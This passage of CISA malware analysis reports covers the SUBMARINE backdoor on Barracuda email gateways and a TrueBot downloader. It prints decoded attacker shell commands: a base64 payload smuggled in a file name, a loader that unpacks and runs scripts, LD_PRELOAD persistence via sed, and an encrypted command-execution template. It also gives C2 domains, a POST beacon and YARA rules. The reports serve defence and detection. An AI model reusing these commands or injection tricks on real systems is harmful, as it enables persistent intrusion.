--End Base64 Decoded Command--

The commands will decode the base64 encoded string and execute the decoded result as a shell command. The commands will pass the contents of the file 'r' to be decoded then decompressed with the 'tar' command. Then, the file 'run.sh' executes with the 'nohup' parameter. The 'nohup' parameter allows the process launched on the shell to continue executing even if the shell is closed. The 'BSMTP_ID' is passed and all errors redirected and discarded to the '/dev/null' directory. Lastly, the contents of the '/root/machine' directory will be removed, permissions are set to executable, and shell scripts containing a name with the string 'mach*' in the root directory are executed.

Screenshots
Figure 1

Figure 1. - The malicious SQL trigger called 'cuda_trigger'.

Figure 2

Figure 2. - A small snippet of the base64 blob being written into the file 'r'.

Figure 3

Figure 3. - A small snippet of the base64 encoded command found after 'r' is written.

8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239

Details

-->

Name machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh
Size 202 bytes
Type ASCII text
MD5 c5c93ba36e079892c1123fe9dffd660f
SHA1 e1df0da64a895ff00fc27a41898aa221b5b7d926
SHA256 8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239
SHA512 a07e79b99e02fa52ab5ab75fc2d989d35d4b360a57fdf0ec5569f445fe1820d26915adbd4f30e3a9126e5cabcde9ca840779039393c39e5838618f06db47a4cc
ssdeep 3:jT81L9RUjD+rlczyX837QTa0NDO9Z8giofQHcQMHL6wF8ufIhW0TaT7ZsNvn:c1JRID+pc2XS7Ga0yYgC3GLX8Q0TaRsv
Entropy 5.481015
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_07 : SUBMARINE trojan dropper exploit_kit evades_av hides_executing_code hides_artifacts exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-11"
           Last_Modified = "20230711_1830"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "evades-av hides-executing-code hides-artifacts"
           Malware_Type = "trojan dropper exploit-kit"
           Tool_Type = "exploitation"
           Description = "Detects ESG FileName exploit samples"
           SHA256 = "8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239"
       strings:
           $s1 = { 7c 20 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
           $s2 = { 65 63 68 6f 20 2d 6e }
           $s3 = { 59 32 46 30 49 43 39 32 59 58 49 76 64 47 31 77 4c 33 49 67 66 43 42 69 59 58 4e 6c 4e 6a 51 67 4c 57 51 67 4c 57 6b 67 66 43 42 30 59 58 49 67 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Description

The file 'machineecho -n Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK _ base64 -d _sh`_' is a SUBMARINE artifact. The file is a shell script identified in the '/root' directory and contains base64 encoded commands. The name of the file is designed to exploit a vulnerability on the target environment where the base64 string within the file name will be executed on the Linux shell.

--Begin Base64 Decoded Name/Command--
chmod +x /root/mac*
sh /root/mach*`*
--End Base64 Decoded Name/Command--

The above commands will change the permissions of the directory, '/root/mac*', to executable.

The file contains a series of operations, such as decoding a base64 encoded string and executing the decoded result as a shell command. The decoded base64 string represents a series of commands that will be executed by the shell.

~Begin Base64 Decoded Command~

cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/run.sh    >/dev/null 2>&1 &
rm -f /root/machine`*

~End Base64 Decoded Command~

This command is identical to the decoded base64 commands found in the SQL trigger identified in the file 'config.snapshot'.

6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0

Details

-->

Name r
Size 4857 bytes
Type ASCII text, with very long lines
MD5 03e07c538a5e0e7906af803a83c97a1e
SHA1 600452b1cff8d99e41093be8b68f62e7c85f23d7
SHA256 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
SHA512 a4a6257dd6f859ae58de3b46879926ce99e3e3edb16db37dc80da4975f5a2866f4cd722233b98c9553e319e61661cae98d535ccb26d8c9709cf6f2efa56b9b3f
ssdeep 96:pjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIZ:pjXDN0wSWQp08UpsmFm4mhCC
Entropy 5.988140
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_02 : SUBMARINE trojan backdoor exploitation hides_artifacts prevents_artifact_access
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-06-29"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "hides-artifacts prevents-artifact-access"
           Malware_Type = "trojan backdoor"
           Tool_Type = "exploitation"
           Description = "Detects encoded GZIP archive samples"
           SHA256_1 = "6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0"
       strings:
           $s1 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 }
           $s2 = { 44 44 44 41 67 50 39 2f 2b 43 38 47 70 2f 36 63 41 46 41 41 41 41 3d 3d 0a}
           $s3 = { 37 56 4d 70 56 58 4f 37 2b 6d 4c 39 78 2b 50 59 }
       condition:
           filesize 5.8)
    }
ssdeep Matches

No matches found.

Relationships
6dd8de093e... Contains 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
6dd8de093e... Contains bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
Description

The file 'r' is a SUBMARINE artifact. The file is a Base64 encoded GNU Zip (GZIP) archive. When the 'cat /*/*/r | base64 -d -i | tar -zx -C /*/*' Linux Shell command is applied to 'r', it decompresses two files. The aforementioned Linux Shell command is contained in 'config.snapshot' as a Base64 encoded SQL trigger.

--Begin Decompressed Files--
1. run.sh (bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a)
2. libutil.so (81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab)
--End Decompressed Files--

bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a

Details

-->

Name run.sh
Size 473 bytes
Type POSIX shell script, ASCII text executable
MD5 c2e577c71d591999ad5c581e49343093
SHA1 d446e06e40053214788aa1bad17b6d3587a2a370
SHA256 bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
SHA512 ffe528fcb448424b1f811a4b9068402971bf2705ad64e556071a062cd89d74d371d3ef41afca38450b7d8457611246a6ba35478dfc83e997950d2f85c8dac80f
ssdeep 12:avOAsp2yBXGTVjnJAIFw/J7G80ZWkbUErPzg:azsphBXSFZFwgLWkXg
Entropy 5.323635
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_03 : SUBMARINE trojan backdoor loader rootkit virus controls_local_machine hides_artifacts infects_files installs_other_components remote_access exploitation information_gathering
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-03"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "controls-local-machine hides-artifacts infects-files installs-other-components"
           Malware_Type = "trojan backdoor loader rootkit virus"
           Tool_Type = "remote-access exploitation information-gathering"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a"
       strings:
           $s1 = { 73 65 64 20 2d 69 }
           $s2 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d }
           $s3 = { 6c 69 62 75 74 69 6c 2e 73 6f }
           $s4 = { 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c }
           $s5 = { 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 }
           $s6 = { 72 6d 20 2d 72 66 }
           $s7 = { 62 61 73 65 36 34 20 2d 64 }
           $s8 = { 7c 73 68 }
           $s9 = { 72 65 73 74 61 72 74 }
           $s10 = { 2f 64 65 76 2f 6e 75 6c 6c }
           $s11 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           $s12 = { 62 61 73 65 36 34 }
       condition:
           filesize }
  • rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-05"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"
           Malware_Type = "trojan backdoor"
           Tool_Type = "remote-access exploitation"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"
       strings:
           $s1 = { 73 6c 65 65 70 }
           $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
           $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
           $s6 = { 73 68 }
           $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Relationships
bbbae0455f... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
Description

The file 'run.sh' is a SUBMARINE loader. The file is a shell script located at within the archive 'r' in the '/var/tmp' directory. The purpose of 'run.sh' is to perform a combination of file manipulation, script generation and execution (Figure 4). There are 4 variables within 'run.sh':

--Begin Variable List--

B1=$1
F="/boot/os_tools/hw-set"
S="/home/product/code/firmware/current/sbin/smtpctl"
A="/boot/os_tools/libutil.so"
B=`echo -n "sed -i "s|exec|BSMTP_ID=$B1 LD_PRELOAD=$A exec|g" $S"|base64 -w0`

--End Variable List--

The script begins by moving SUBMARINE from the '/var/tmp/' directory to the '/boot/os_tools/' directory for persistence.

The variable "B" is declared as a 'sed' command that replaces all occurrences of the string 'exec' with `BSMTP_ID=$1 LD_PRELOAD=/boot/os_tools/libutil.so exec /home/product/code/firmware/current/sbin/smtpctl'. This 'sed' command is then base64 encoded.

A new file called 'hw-set' is created in the '/boot/os_tools/' directory. A line is appended to the 'smtpctl' file which checks for the string 'LD_PRELOAD'. If the string is not found, the base64 encoded string stored in variable "B" is decoded and executed as a shell command and 'smtpctl' is restarted.

The 'chmod' command is used to set executable permissions for 'hw-set'.

The 'sed' command is used with a '-i' flag to modify the file 'update_version' within the '/boot/os_tools/' directory with an appended string to line 44. The appended string, "system('/boot/os_tools/hw-set 2>&1 >/dev/null &');", will run the file 'hw-set' in the background and redirect both output and errors to 'dev/null' whenever the file 'update_version' is executed.

The file 'hw-set' is executed and the 'sed' command with the '-i' flag is used to insert the string 'sleep 2m' on line 1 to set a sleep duration of 2 minutes.

Finally, all files and directories within '/var/tmp/' directory are removed.

Screenshots
Figure 4

Figure 4. - The contents of the file, 'run.sh.'

b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43

Details

-->

Name hw-set
Name sedO4CWZ9
Size 341 bytes
Type POSIX shell script, ASCII text executable, with very long lines
MD5 b860198feca7398bc79a8ec69afc65ed
SHA1 c4c64da81995044ea3447b8ffd07689382b7487b
SHA256 b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43
SHA512 0d4b66dbeb88e8c9fb970572c033ab84b8273734277edb139cdc04560a0547d192a6762fc8ed8138eb43f7d05df6c36aa6bc1987eda4a4b6075e9059e71ef358
ssdeep 6:JkKgPxJooRKGKBNvd/UntDEcQwj7bPfNcgUBZqcL0FcXfFtC2i+RKGKBNvSv:alZJoospwtIclTNcRDnv7CJ+spSv
Entropy 5.713942
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-05"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"
           Malware_Type = "trojan backdoor"
           Tool_Type = "remote-access exploitation"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"
       strings:
           $s1 = { 73 6c 65 65 70 }
           $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
           $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
           $s6 = { 73 68 }
           $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Description

The file 'hw-set' is a SUBMARINE artifact. The file is a shell script located in the '/boot/os_tools/' directory and contains shell commands as well as a base64 encoded string (Figure 5). The shell script is set to sleep for 2 minutes prior to execution. The 'grep' command checks if the string 'LD_PRELOAD' is contained within the 'smtpctl' file located at '/home/product/code/firmware/current/sbin/'. The exclamation point (!) prepending the script is used to check for success or failure of the 'grep' command. If the string 'LD_PRELOAD' is not identified, a base64 encoded 'sed' command is used to modify the 'smtpctl' file (Figure 6).

Screenshots
Figure 5

Figure 5. - The contents of the shell script in the file 'hw-set'.

Figure 6

Figure 6. - The decoded base64 string contained in the shell script of the file 'hw-set'.

cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a

Details

-->

Name smtpctl
Size 3759 bytes
Type POSIX shell script, ASCII text executable
MD5 35a432e40da597c7ab63ff16b09d19d8
SHA1 b798b881b89526051ee5d50f24239b3a952c9724
SHA256 cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a
SHA512 af6aa47f44e604a60930f122ebd47d6c1b83c756b005d79ade8af147bfbfab40f16ba91e32021d65b18b21e06911476fb5d03f050850c8300d1e7d7a3e61c36b
ssdeep 48:t7c4VFuL2/zkanTvNpofcgBnY5NBFTGc5FjJWgkFBhhkQ1jtbA5lwmNdBITf3K3M:xcOko1iyGc6FzKAjDTvssgRaI7Q
Entropy 5.178501
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_05 : SUBMARINE trojan backdoor remote_access_trojan compromises_data_integrity cleans_traces_of_infection hides_artifacts installs_other_components remote_access exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-05"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "compromises-data-integrity cleans-traces-of-infection hides-artifacts installs-other-components"
           Malware_Type = "trojan backdoor remote-access-trojan"
           Tool_Type = "remote-access exploitation"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a"
       strings:
           $s1 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s2 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 2f 6c 69 62 75 74 69 6c 2e 73 6f 20 65 78 65 63 }
           $s4 = { 3e 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 }
           $s5 = { 62 73 6d 74 70 64 20 63 6f 6e 74 72 6f 6c 20 73 63 72 69 70 74 }
           $s6 = { 42 53 4d 54 50 44 5f 50 49 44 }
           $s7 = { 2f 72 65 6c 6f 61 64 2f 72 65 73 74 61 72 74 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Description

The file 'smtpctl' is a SUBMARINE loader. The file is a maliciously modified shell script used to remove mail files in 2 directories as well as load SUBMARINE as a shared library for the Batched Simple Mail Transfer Protocol (BSMTP) daemon.

~Begin File Removal Commands~
rm -f /mail/scan/body*
rm -f /mail/tmp/mimeattach.*
~End File Removal Commands~

Appended malicious code at the bottom of 'smtpctl.sh' sets the BSMTP_ID and SUBMARINE is preloaded as a shared library from the '/boot/os_tools' directory. It then executes the BSMTP daemon. If the BSMTPD_PID variable is set, debug mode is enabled. If the BSMTPD_PID variable is not set, execution continues without enabling debug mode. Additionally, any instances of the string 'reload' in the command are replaced with 'restart' and all errors are redirected to '/dev/null' (Figure 7).

Screenshots
Figure 7

Figure 7. - The appended malicious code loading SUBMARINE as the shared library for the BSMTP daemon. The BSMTP_ID value will be unique per device.

81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab

Details

-->

Name libutil.so
Name update_version
Size 9396 bytes
Type ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
MD5 b745626b36b841ed03eddfb08e6bb061
SHA1 cb20b167795db258b307ddee91ded87a9e7562d0
SHA256 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
SHA512 d6b9dfc9b784ca76386cbbf2c75c7e0ad3ac45e4420a838bc21b1464d07208f46901d7a0c8fbeca90303ce48720d7fd60b76d25cfebf5ea5b385e6b9db10ed98
ssdeep 96:dVdsadO5BT/aucX3Qa/c2D1UKDUzW1MuBFQC0NysEuSobXoWhP:yadO5B71cX3Qgc2uKD+aMLC01EuSo
Entropy 3.466134
Malware Result unknown
Path /boot/os_tools/libutil.so
Path /boot/os_tools/update_version
Path /var/tmp/libutil.so
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_01 : SUBMARINE trojan backdoor remote_access_trojan remote_access information_gathering exploitation determines_c2_server controls_local_machine compromises_data_integrity
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-29"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "determines-c2-server controls-local-machine compromises-data-integrity"
           Malware_Type = "trojan backdoor remote-access-trojan"
           Tool_Type = "remote-access information-gathering exploitation"
           Description = "Detects SUBMARINE Barracuda backdoor samples"
           SHA256_1 = "81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab"
       strings:
           $s1 = { 32 35 30 2d 6d 61 69 6c 32 2e 65 63 63 65 6e 74 72 69 63 2e 64 75 63 6b }
           $s2 = { 6f 70 65 6e 73 73 6c 20 61 65 73 2d 32 35 36 }
           $s3 = { 65 63 68 6f 20 2d 6e 20 27 25 73 27 20 7c 20 62 61 73 65 36 34 20 2d 64 }
           $s4 = { 2d 69 76 }
           $s5 = { 48 65 6c 6c 6f 20 25 73 20 5b 25 73 5d 2c 20 70 6c 65 61 73 65 64 20 74 6f 20 6d 65 65 74 20 79 6f 75 }
           $s6 = { e8 47 fa ff }
           $s7 = { 63 6f 6d 6d 61 6e 64 }
           $s8 = { 2d 69 76 20 36 39 38 32 32 62 36 63 }
           $s9 = { 73 65 6e 64 }
           $s10 = { 73 6f 63 6B 65 74 }
           $s11 = { 63 6f 6e 6e 65 63 74 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Relationships
81cf3b162a... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
Description

The file 'libutil.so' is the SUBMARINE payload. 'libutil.so' is preloaded into the BSMTP daemon, the Linux executable responsible for receiving emails, and processing Simple Mail Transfer Protocol (SMTP) reply messages. Linux Shared Object Preloading is analogous to Dynamic-Link Library (DLL) side loading and DLL injection in the Windows OS.

This file is preloaded using the 'LD_PRELOAD' parameter, applied to 'bsmtpd', the BSMTP daemon executable. The preload parameter is added to two configuration files, files that control the behavior of 'bsmtpd.' When the configuration files restart the daemon, 'libutil.so' is loaded into its process memory, giving it the same privileges and access as 'bsmtpd.'

The malware obtains the BSMTP_ID environment variable from the infected system. The BSMTP_ID has the capacity to be used as a port for malicious traffic. (Figure 8). The process this shared object file is running in, 'bsmtpd', is duplicated and launched using the 'fork' Linux function (Figure 9). The malware opens a connection to 127.0.0.1 on the victim machine it is running on (Figure 10). The 'recv' function is called after the connection is opened, showing that the malware has the capacity to obtain information from the context/environment its executed on.

Figure 11, Pane 1, shows configuration settings for the BSMTP daemon, that allows any email traffic for the address range of 127/8 and multiple actions including 'ehlo.' Pane 2 shows the malware intaking data, and loading the 'ehlo' action into memory.

Figure 12, Pane 1, shows the malware, in conjunction with 'snprintf_chk', printing the string 'echo -n '%s' | base64 -d | openssl aes-256-cbc -d -K 66833b26%d -iv 69822b6c%d 2>/dev/null | sh', to the Linux shell. The string is a command that accepts input '%s', decodes it with Base64, decrypts it with AES, pipes errors to std_out and executes it on the target with the 'sh' bash command and 'system' Linux function. Lastly, the malware has the capacity to print the SMTP string, '250-mail2.eccentric.duck Hello %s [%s], pleased to meet you' . Therefore, given this information, the malware has the capacity to accept encoded and encrypted inputs from 'bsmtpd', execute them, and print a message.

Screenshots
Figure 8

Figure 8. - Depicts the Linux function 'getenv' "BSMTP_ID" and setting the variable named "SRC_PORT".

Figure 9

Figure 9. - Depicts the Linux function 'fork.'

Figure 10

Figure 10. - Depicts the initialization of a connection using the Berkeley Sockets API.

Figure 11

Figure 11. - Pane 1 shows configuration settings for the BSMTP daemon, not in the malware. Pane 2 shows part of that configuration in the malware.

Figure 12

Figure 12. - Pane 1 shows the Linux functions 'snprintf_chk' and 'system.' Pane 2 shows configuration settings, for the BSMTP daemon.

Relationship Summary

6dd8de093e... Contains 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
6dd8de093e... Contains bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
bbbae0455f... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
81cf3b162a... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Acknowledgments

Mandiant contributed to this report.

 
July 5, 2023

MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received one Windows Portable Executable (PE) file for analysis. The file is a variant of TrueBot malware. It is designed to collect system information and report it to a command-and-control (C2). The bot is also capable of downloading and executing additional payloads.

For more information about this compromise, see Joint Cybersecurity Advisory Increased Truebot Activity Infects U.S. and Canada Based Networks.

Download the PDF version of this report:

For a downloadable copy of IOCs, see

AA23-187A STIX XML (XML, 204.54 KB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see

MAR-10445155-1.v1 STIX JSON (JSON, 16.51 KB )
Submitted Files (1)

7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7 (3LXJyAv6Gf.exe)

Domains (2)

dremmfyttrred[.]com

droogggdhfhf[.]com

Findings

7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7

Tags

trojan

Details
Name 3LXJyAv6Gf.exe
Size 1200732656 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 5588286a702e0c36c8318be0b164fa8c
SHA1 5449f3f141958de2d1140bc8323f5ac95c203287
SHA256 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
SHA512 105e72e1f1e3af8942e0e77e1294f74cd0518f7d601e4e2f20f7ed9db3cd1c67739c31e085e028eafe0394af74b2fbeb6ffbffb67d7731023a04c53a6784924e
ssdeep 25165824:d1AuQ/FFyK8db8kdjeyPpiMh5gbiwcfYjh+dkfaeLq4H/LLhtf:Q/FoK8rteknh54ZcfvdkfpnLhtf
Entropy 7.999996
Antivirus
ESET a variant of Win64/Agent.BVF trojan
YARA Rules
  • rule CISA_10445155_01 : TRUEBOT downloader
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10445155"
           Date = "2023-05-17"
           Last_Modified = "20230523_1500"
           Actor = "n/a"
           Family = "TRUEBOT"
           Capabilities = "n/a"
           Malware_Type = "downloader"
           Tool_Type = "n/a"
           Description = "Detects TRUEBOT downloader samples"
           SHA256 = "7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7"
       strings:
           $s1 = { 64 72 65 6d 6d 66 79 74 74 72 72 65 64 2e 63 6f 6d }
           $s2 = { 4e 73 75 32 4f 64 69 77 6f 64 4f 73 32 }
           $s3 = { 59 69 50 75 6d 79 62 6f 73 61 57 69 57 65 78 79 }
           $s4 = { 72 65 70 6f 74 73 5f 65 72 72 6f 72 2e 74 78 74 }
           $s5 = { 4c 6b 6a 64 73 6c 66 6a 33 32 6f 69 6a 72 66 65 77 67 77 2e 6d 70 34 }
           $s6 = { 54 00 72 00 69 00 67 00 67 00 65 00 72 00 31 00 32 }
           $s7 = { 54 00 55 00 72 00 66 00 57 00 65 00 73 00 54 00 69 00 66 00 73 00 66 }
       condition:
           5 of them
    }
ssdeep Matches

No matches found.

Relationships
7d75244449... Connected_To dremmfyttrred[.]com
7d75244449... Connected_To droogggdhfhf[.]com
Description

This artifact is a variant of the TrueBot downloader. The file is padded with over one gigabyte (Gb) of junk code, designed to hinder analysis. When the bot is executed on the system, it will check the current Operating System (OS) version (RtlGetVersion) and the processor architecture (GetNativeSystemInfo). From this information the bot will create a unique ID for the compromised system. It will store the ID in C:ProgramData as a randomly named 13 character file with a .JSONIP extension, e.g. ‘IgtyXEQuCEvAM.JSONIP’.

The malware proceeds to enumerate all running processes on the system. The bot configuration contains a list of common Windows processes that are excluded from its list. The remaining process names are concatenated into a base64 encoded string. The malware specifically looks for the presence of the following disassembly and debugging tools:

—Begin Disassembly & Debugging Tools—
IDA Pro
Process Monitor
ProcessHacker
Process Explorer
CFF Explorer
Resource Hacker
Cheatengine-x86_64
OllyDbg
Radare2
X64dbg
WinDbg
Zeta Debugger
Rock Debugger
Obsidian debugger
—End Disassembly & Debugging Tools—

The presence of these tools does not change the execution of the malware. They are also concatenated into a base64 encoded string and sent along with the system information.

Next, the malware will collect the ComputerName and Domain name of the system. All of the collected information and the unique ID is sent to a hard-coded Uniform Resource Locator (URL) in a POST request using a unique User-agent string:

—Begin POST Request—
POST
dremmfyttrred[.]com/dns.php
Content-type: application/x-www-form-urlencoded
Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)
—End POST Request—

The malware uses a second obfuscated domain to accept commands and receive additional payloads. The configuration contains two base64 encoded strings that the malware will decode and run through a string operation to generate a unique hexadecimal string. The hexadecimal string is decoded using the embedded RC4 key ‘YiPumybosaWiWexy’. The following URL was decoded from the strings:

—Begin Decoded URL—
droogggdhfhf[.]com/gate.php
—End Decoded URL—

dremmfyttrred[.]com

Tags

command-and-control

HTTP Sessions
  • POST
    dremmfyttrred[.]com/dns.php
    Content-type: application/x-www-form-urlencoded
    Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)
Relationships
dremmfyttrred[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
Description

3LXJyA6Gf.exe attempts to send the collected system information to this domain.

